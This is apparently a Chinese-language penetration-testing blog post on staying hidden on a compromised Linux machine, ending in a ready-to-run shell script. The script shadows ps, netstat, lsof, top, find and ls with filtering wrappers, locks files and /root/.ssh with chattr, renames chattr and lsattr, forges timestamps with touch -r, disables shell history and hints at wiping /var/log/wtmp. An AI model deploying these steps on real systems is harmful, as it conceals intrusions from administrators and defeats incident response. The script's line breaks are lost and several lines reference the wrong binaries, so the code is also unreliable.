在內網滲透時，有時需要將工具放在目標機程序執行，但這裡就需要考慮隱蔽性的問題。下面所講的不是什麼高大上的技術，只是一些常用的技巧。

程序隱匿netstat 偽裝

首先，包裝下 netstat 命令，ps 路徑為： /usr/bin/netstat

之後，建立 /usr/local/bin/netstat 檔案，寫入內容：

#!/bin/bash/usr/bin/ps $@ | grep -Ev 'name|address|port'

最後，賦予執行許可權 chmod +x /usr/local/bin/netstat

執行 which netstat 看下命令變化：

netstat 命令修改前後的對比：

當我們自己使用時，直接用 /bin/netstat 就 OK 了。

檔案隱匿

首先，看下 Linux chattr 命令，用於改變檔案屬性。這項指令可改變存放在ext2檔案系統上的檔案或目錄屬性，這些屬性共有以下8種模式：

a：讓檔案或目錄僅供附加用途b：不更新檔案或目錄的最後存取時間c：將檔案或目錄壓縮後存放d：將檔案或目錄排除在傾倒操作之外i：不得任意更改檔案或目錄s：保密性刪除檔案或目錄S：即時更新檔案或目錄u：預防意外刪除

實戰中常用的為 +a (只能追加，不能刪除) 與 +i (不能更改) ：

這裡，還需要將 chattr 與 lsattr 命令程序隱藏：

mv /usr/bin/chattr /usr/bin/chtmv /usr/bin/lsattr /usr/bin/lst

檔案時間修改

touch -acmr /bin/ls /usr/bin/cht ( 修改 後一個檔案時間 與 前一個檔案時間 一致)

引數-a：改變訪問時間為當前時間-m：改變修改時間為當前時間-c：檔案不存在不新建檔案-r：使用參考檔案的時間-d：設定為指定時間-t：設定檔案的時間記錄附: sh指令碼

#!/bin/bash# history# unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0# pstouch /usr/local/bin/pscat <<EOF >> /usr/local/bin/ps#!/bin/bash/bin/ps \$@ | grep -Ev 'name|address|port'/usr/bin/ps \$@ | grep -Ev 'name|address|port'EOFchmod +x /usr/local/bin/ps && touch -acmr /bin/ps /usr/local/bin/ps# netstattouch /usr/local/bin/netstatcat <<EOF >> /usr/local/bin/netstat#!/bin/bash/bin/netstat \$@ | grep -Ev 'name|address|port'/usr/bin/netstat \$@ | grep -Ev 'name|address|port'EOFchmod +x /usr/local/bin/netstat && touch -acmr /bin/netstat /usr/local/bin/netstat# lsoftouch /usr/local/bin/lsofcat <<EOF >> /usr/local/bin/lsof#!/bin/bash/bin/lsof \$@ | grep -Ev 'name|address|port'/usr/bin/lsof \$@ | grep -Ev 'name|address|port'EOFchmod +x /usr/local/bin/lsof && touch -acmr /bin/lsof /usr/local/bin/lsof# toptouch /usr/local/bin/topcat <<EOF >> /usr/local/bin/top#!/bin/bash/bin/top \$@ | grep -Ev 'name|address|port'/usr/bin/top \$@ | grep -Ev 'name|address|port'EOFchmod +x /usr/local/bin/top && touch -acmr /bin/top /usr/local/bin/lsof# findtouch /usr/local/bin/findcat <<EOF >> /usr/local/bin/find #!/bin/bash/bin/find \$@ | grep -Ev 'name|address|port'/usr/bin/find \$@ | grep -Ev 'name|address|port'EOFchmod +x /usr/local/bin/find && touch -acmr /bin/find /usr/local/bin/lsof# lstouch /usr/local/bin/lscat <<EOF >> /usr/local/bin/ls#!/bin/bash/bin/ls \$@ | grep -Ev 'name|address|port'/usr/bin/ls \$@ | grep -Ev 'name|address|port'EOFchmod +x /usr/local/bin/ls && touch -acmr /bin/ls /usr/local/bin/ls# chattr & lsattr#!/bin/bashmkdir /tmp/.tmp/chattr +a /tmp/.tmp/chattr +a /root/.ssh/mv /usr/bin/chattr /usr/bin/chtmv /usr/bin/lsattr /usr/bin/lst# last# echo "" > /var/log/wtmp